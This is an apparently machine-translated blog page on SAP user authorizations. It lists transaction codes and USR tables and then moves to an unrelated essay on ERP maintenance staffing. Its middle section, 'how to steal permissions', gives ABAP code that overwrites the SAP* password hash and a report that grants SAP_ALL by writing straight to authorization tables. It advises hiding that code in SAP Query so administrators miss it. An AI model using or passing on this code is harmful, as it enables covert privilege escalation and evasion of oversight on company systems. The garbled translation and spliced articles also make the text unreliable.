SAP User Permissions and cracking vigilance: SAP User Permissions and cracking SAP User Permissions anatomy: basis usually uses pfcg for permission management, you will generate a non-system prifile name when saving the file. Do you remember that the user in su01 has two columns: profile and role? What are their relationships? First, understand several concepts. 1. let's talk about activity in this way. Let's talk about activity. You can find out what it means by searching the dictionary. That's right, you can define what action to do. For example, you can only drink alcohol, not more than two, no, this is what my wife said. SAP is not like this. It can only be insert, update, display or something. the Germans wrote these things in the tobj table. activity can also be divided into activity groups. 2. activity category & Authorization group role vs profile you can see the table t020 and you will know what K, D, a, m and so on. what is profile? Actually, it can be understood as all authorization data (there are a lot of authorization groups -- {You can use oba7 to fill in, the permission is too fine is not a good thing ^ _ ^} and activity composition) the name of a set. Generally, a custom role generates a profile. SAP permission control is controlled based on the authorization data (objects) in the profile. what is role? Role is just a name, and then the profile is assigned to it. For example, if you create a user in su01, I don't have any role, but adding a profile such as sap_all can do anything. SAP itself has many default Role & profile. 3. the most common pfcg-> authorizations-> change authorization data-> after entering, select selection criteria. You can see that all authorization objects can be manually added to the authorization object, for example, if an error occurs when you use a t-code permission, ABAP uses su53 to check which authorization objec is missing, and then manually add it. if you select authorization levels, you can subdivide permissions by account type. some are even directly directed to table fields. and you can even allocate cache for an object. Buffer. so how does sap implement permission control? The Butcher will use Xiao Zai. 4. several T-codes about permissions. (1) role (role) related t-code: pfac standard pfac_chg change pfac_del Delete pfac_dis show pfac_ins new pfac_str pfcg create role_cmp compare supc batch create role profile swuj test su03 detect authorzation data su25, su26 check updated profile (2) create user-related t-code: su0 su01 su01d su01_n *** su05 su50, su51, su52 su1 su10 bulk su12 bulk sucomp: maintain user company address su2 change user parameter suim user information system user group sugr: maintain sugrd: Display sugrd_n ***: Or maintain sugr_n ***: or display (3) about Profile & authoraztion data su02: directly create a profile without using role su20: subdivided authorization fields su21 (su03 ): * *** maintain authorization objects (tobj, usr12 ). for creden, you can subscribe to: f_bkpf_bed: accounting document: account authorization for customers f_bkpf_bek: accounting document: account authorization for vendors f_bkpf_bes: accounting document: account authorization for g/L accounts f_bkpf_ B: accounting docu Ment: Authorization for document types attributes: accounting document: Authorization for company codes f_bkpf_bup: accounting document: Authorization for posting periods f_bkpf_gsb: accounting document: Authorization for business areas f_bkpf_koa: accounting document: authorization for account types f_bkpf_vw: accounting document: change default values for Doc. type/psky, And you can further segment them. These items are saved on usr1 2. in the DB layer, it is utab. the specific transaction code subdivision: su22, su24 su53: *** is used to check that no authoraztion objects exists. su56: Analyze authoraztion data buffers. su87: used to check the history su96, su97, su98, and su99 generated by user changes? Supc: Generate role dB and logical layers in batches: sukri: Transaction combinations critical for security tables: tobj: All avaiable authorzation objects. (All Here) usr12: user-level authoraztion value --------------------------- usr01: Master Data usr02: Password in usr04: authorization in usr03: User address data usr05: User master parameter ID usr06: additional data per user usr07: Object/Values of last authorization check that failed usr08: Table for user menu entries Usr09: entries for user menus (Work Areas) usr10: User master authorization profiles usr11: User master texts for profiles (usr10) usr12: User master authorization values usr13: Short texts for authorizations usr14: surchargeable language versions per user usr15: external user name usr16: Values for variables for user authorizations usr20: Date of last user master reorganization usr21: Assign user name Add RESS key usr22: logon data without kernel access usr30: Additional information for user menu usr40: Table for illegal passwords usr41: current user usrefus: usrbf2 usrbf3 ust04: user profile here ust10c: composite profiles ust10s: single profiles (ust12 for the role: authorizations ....................................... ..................... how to steal permissions .............................. user: User Type (not to mention what to do): the common user types include. di Alog (normal user) B. communication C. system D. service e. reference. usually, you must have the permission to check before using any T-code. authority_check: This function only checks whether your user has expired. ** if coding only needs to use this function. authority_check_tcode: Check T-code. The compile function actually checks autorization objects. susr_user_auth_for_obj_get: authorization_data_read_selobj: ------------------------------------------ it is very simple to change the password of sap * to 123. we can find the user logon table usr02. (df52478e6ff90eeb is encrypted by SAP Which of the following has studied sap password encryption for databases ?) Report zmodsap *. data zusr02 like usr02. select single * into zusr02 from usr02 where bname = 'sap *'. zUSR02-Bcode = 'df52478e6ff90eeb '. update usr02 from zusr02. the problem now is how to make your basis invisible. It is very simple to hide the code in the query. That is to say, if you make a query, the query will generate code, and then you add this code, who can think of it ??? Then you will wait for your basis to cry... this is so cool. I suggest you secretly create your own users. here you must have a clear permission structure. permissions are related to the three tables. a. usr04 B. usr04 C. the usrbf2 table corresponds to the authorzization objects used. * & ----------------------------------------------------------------------- ** & Report: steal sap all right ** & creation date: 2004.04.01 ** & created by: Stone. fu ** & Description: You can steal sap all permissions ** & modified Date: 2005.11.02 * & Description: Run this code hide in report painter o R query code ** & --------------------------------------------------------------------- * Report zrightsteal. Data zusr04 like usr04 ."???????? Work area ?? Data zust04 like usr04. Data zprofs like USR04-PROFS. Data zusrbf2 like usrbf2 occurs 0 with header line. "usrbf2 ????? Internal table ** update authorization table usr04. select single * into zusr04 from usr04 where bname = 'zabc2 '. "sap all permission move 'C sap_all 'to zprofs. ZUSR04-NRPRO = '14 '. zUSR04-PROFS = zprofs. update usr04 from zusr04. ** update user authorization masters table ust04. select single * into zust04 from ust04 where bname = 'zabc2 '. zUST04-PROFILE = 'sap _ all '. "sap all permission update ust04 from zust0 4 .*????? Insert * ZUST04-MANDT = '20140901 '. * ZUST04-BNAME = 'zabc2 '. * ZUST04-PROFILE = 'sap _ all '. * Insert ust04 from zust04. select * From usrbf2 into Table zusrbf2 where bname = 'sap *'. loop at zusrbf2. ZUSRBF2-BNAME = 'zabc2 '. modify zusrbf2 index sy-tabix transporting bname. endloop. insert usrbf2 from Table zusrbf2 accepting duplicate keys. create a ztest user without any permissions and run the report zrightsteal on the test machine. then ztest is Sa. P_all, and then you put the code hide in the SQP query code. the ABAP code is too easy to detect. in fact, sap * is locked when you change the password of sap *. The user running this program must have the corresponding permissions in s_program or s_query. Niuchao was published on: 2007.09.28: Classification: (SAP): Read: (117 times): permanent link: Reference (0) November 28, September 25, 2007, for SAP projects, people often say a lot about the people needed for the project-each module has an internal consultant and a developer, and basis and clerks are counted. How can this problem be solved. This scale is daunting. However, SAP projects do not need to be adjusted for a long time after they are launched, as an internal consultant, you need to learn more-learn new knowledge for improvement or expansion. The problems at this stage are mainly caused by insufficient user skills. Through reasonable allocation of personnel, small and medium-sized enterprises can greatly reduce their investment in personnel. For small and medium-sized enterprises, a reasonable internal consultant for an SAP project can be controlled at around 5-6 people. The internal maintenance of ERP is divided into four layers. The first layer of the two phases is the system application layer, which mainly solves some operation-level problems. For example, if the wrong price is entered for opening a purchase order and the wrong date is entered for warehouse import. The problem at this level can usually be solved by key users-the problem is more manifested in the process and permissions. You only need to grant key users the permission to modify the records. If an error occurs, you can modify the records by a dedicated person. This part belongs to daily work. I have made statistics on the following issues, which account for more than 70% of system problems: 1. Due to user reasons, data is not input on time or data is missing. 2. incorrect data, especially the amount and date, due to unskilled operations. 3. Errors Caused by process coordination issues. The second level is about system configuration. The problem at this level is that users need to add data on the warehouse, factory, and order types. Because of the great impact on the system, internal consultants can only operate the data. When the system has been running for a certain period of time and needs to be optimized, upgraded, or expanded in terms of management, internal consultants need to reconfigure the system, however, the configuration workload is usually not heavy. This is a special case. Level 3: system development level. The development layer is divided into two stages. The first stage is the opening of system reports. Generally, after the system goes online, the report development needs to be relatively large. After the system has been running stably for a period of time, the user's functional requirements will gradually increase, and then it will enter the second stage, that is, the development of system functions. Of course, SAP itself is a relatively complete system, and the development work is more of an interface with other systems. The first phase of work is also within the scope of routine maintenance. The second stage is a special case. The ERP project manager must communicate with the user. Level 4 system security and backup. Basis is usually responsible for the maintenance work, including user authorization, system backup, and performance optimization. This is part of daily work. From the above situation, as long as we have established a hierarchical maintenance system, we can minimize the number of consultants. The following sections divide the responsibilities of different personnel to optimize the organizational structure of the ERP project. 1. Key users are designated by Department clerks or department leaders. They are mainly responsible for solving all problems occurring at the operation level of the Department or this module. They are required to possess the following basic qualities: A. Understand the operation process and responsibilities of the Department. B. Understand all operations of the Department in the ERP project. C. Record all problems encountered during system operation and archive them. D. Answer the questions raised by the end user and report the unsolved questions to the internal consultant in a timely manner. Key users need to summarize system problems to standardize problem handling. In this way, a large number of basic problems can be solved in the shortest time. Reduces the workload of internal consultants. In this way, the daily work of internal consultants is the development of system reports and the in-depth study of system functions. Key users are provided by at least one department. The investment of key users to work in the original department and ERP projects is about 2 to 1. You can consider adding a salary of-yuan to each key user. However, they must be effectively assessed. 2. Internal consultant (module consultant) the internal consultant is mainly from the IT department. The internal consultant must have the following qualities: A. Familiar with ERP products and be familiar with the basic configurations of the module in charge, in addition, he can thoroughly study the Extended Function B of this module, assist his colleagues in maintaining the function of the second module based on the company's arrangement, and gradually master the basic configuration of this module. C. Responsible for the system secondary development function of this module. For cross-module function development, the project manager arranges the division of labor with other consultants. D. Collect and sort out all problems encountered in this module, and analyze and summarize the problems. Submit the summary report on a regular basis. Submit improvement suggestions based on the report. E. regular training for key ERP users and end users, especially to solve various problems encountered in the process of facts. F. Be responsible for implementing the ERP project of the branch, and instruct relevant staff of the Branch to import the ERP system correctly. The configuration is based on four parts: pp, mm, SD, FI/CO. Four internal consultants are required. 3. The system consultant (technical consultant) is mainly responsible for the permission management, system maintenance and Performance Optimization of the ERP system. The system consultant must have the following qualities: a. Understand and master the software and hardware knowledge of the company's ERP system, especially the maintenance and management knowledge of hosts. Back up the system regularly to ensure normal and stable operation of the system. B. log on to the ERP service website, learn system updates in a timely manner, and promptly add functional or security patches to the system. C. have a deep understanding of the optimization and monitoring functions of the operating system, even if possible problems are predicted. It is particularly important to monitor the hard disk space and memory usage information of the system. D. Master the permission management function of the ERP system, and add or delete permissions for the user in the system based on the user's application and the result of the lead's approval. E. register system problems (such as sap oss website and Oracle meatlink website) on the ERP service website, and report the feedback on the ERP service website to relevant consultants in a timely manner. An enterprise must have a full-time technical consultant. Through the above arrangement, we can establish a support system at three levels: key users-> internal consultants-> technical consultants. The operation-level problems should be solved at the key user level as much as possible, and system configuration and optimization problems should be solved at the internal advisor level. When the internal consultant cannot solve the problem, the technical consultant will seek help on the ERP service website. At the same time, internal consultants also consider mutual cooperation and redundancy: one consultant is mainly responsible for the work of one module, and assists in the work of another module. The module is exchanged every six months to one year. In this way, when a consultant leaves, another consultant can quickly take over his/her work to prevent service interruption. More importantly, we can cultivate and mine ERP service talents among key users. For those who are interested in maintaining the system and have a certain understanding of the system, they provide room for being promoted to internal consultants. When the company's ERP Implementation Department needs to expand, it can be promoted from this group of people at any time. From the perspective of time, the internal consultant's work will be divided into three major stages: the first stage: during the implementation of the ERP project, the internal consultant needs to quickly learn the front-end and back-end functions of the ERP product. Master the maintenance skills of the ERP system and take over the basic maintenance work of the system after the external consultant leaves. Phase 2: within six months after the ERP project was launched, internal consultants should record and sort out the problems encountered during the launch process, and develop simple reports. Stage 3: After the ERP system is stable, internal consultants need to evaluate the implementation effect of the ERP project, and expand the ERP system application according to the company's high-level requirements on the ERP project. For sap products alone, there are only three to four maintenance personnel after the system is launched. For example, Lenovo has over 300 internal consultants. The many or few consultants mainly depend on the company's positioning of ERP products: whether more in-depth applications are required (the more application modules, the more consultants need ), whether to interface with other systems and whether the enterprise has certain special requirements (custom development of special functions ). From the actual situation of XX, I think there are five consultants. Of course, for PP and FI/CO modules that are relatively difficult, you can consider external recruitment and recruit people with certain experience.
(This article come from niuchao's space)